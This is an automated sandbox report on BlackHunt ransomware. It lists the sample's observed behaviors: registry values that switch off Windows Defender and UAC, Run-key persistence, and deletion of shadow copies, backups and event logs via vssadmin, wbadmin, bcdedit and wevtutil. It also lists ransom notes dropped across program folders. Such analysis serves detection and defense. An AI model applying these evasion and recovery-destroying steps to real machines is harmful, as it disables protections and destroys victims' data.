Malware Analysis Report

2025-06-16 00:03

Sample ID 241106-a5vjpssfmn
Target BlackHunt2.exe
SHA256 ba011447038aab7f6b94cad29c2ac6405c1b8098dc65a94fb095af48422a56c9
Tags
defense_evasion discovery evasion execution impact persistence ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ba011447038aab7f6b94cad29c2ac6405c1b8098dc65a94fb095af48422a56c9

Threat Level: Known bad

The file BlackHunt2.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution impact persistence ransomware trojan

Modifies Windows Defender Real-time Protection settings

Deletes NTFS Change Journal

UAC bypass

Renames multiple (3360) files with added filename extension

Renames multiple (2894) files with added filename extension

Modifies boot configuration data using bcdedit

Clears Windows event logs

Deletes shadow copies

Disables use of System Restore points

Deletes backup catalog

Disables Task Manager via registry modification

Checks computer location settings

Deletes itself

Adds Run key to start application

Looks up external IP address via web service

Enumerates connected drives

Checks whether UAC is enabled

Sets desktop wallpaper using registry

Drops file in Program Files directory

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Program crash

Enumerates physical storage devices

Unsigned PE

Runs ping.exe

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Kills process with taskkill

Checks SCSI registry key(s)

Interacts with shadow copies

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Suspicious behavior: CmdExeWriteProcessMemorySpam

System policy modification

Modifies registry class

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-06 00:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-06 00:48

Reported

2024-11-06 00:50

Platform

win7-20240903-en

Max time kernel

121s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

Signatures

Deletes NTFS Change Journal

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\fsutil.exe N/A
N/A N/A C:\Windows\system32\fsutil.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (2894) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables use of System Restore points

evasion

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" C:\Windows\system32\reg.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\fsutil.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\fsutil.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ku_IQ\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dili C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Dublin C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\WhiteDot.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jre7\lib\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\ext\jaccess.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground.wmv C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Caracas C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\bn\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\hy\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\#BlackHunt_ReadMe.txt C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#BlackHunt_Private.key C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\7-Zip\7zCon.sfx C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#BlackHunt_ReadMe.hta C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon C:\Windows\system32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2872 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\system32\vssadmin.exe
PID 2872 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\system32\vssadmin.exe
PID 2872 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\system32\vssadmin.exe
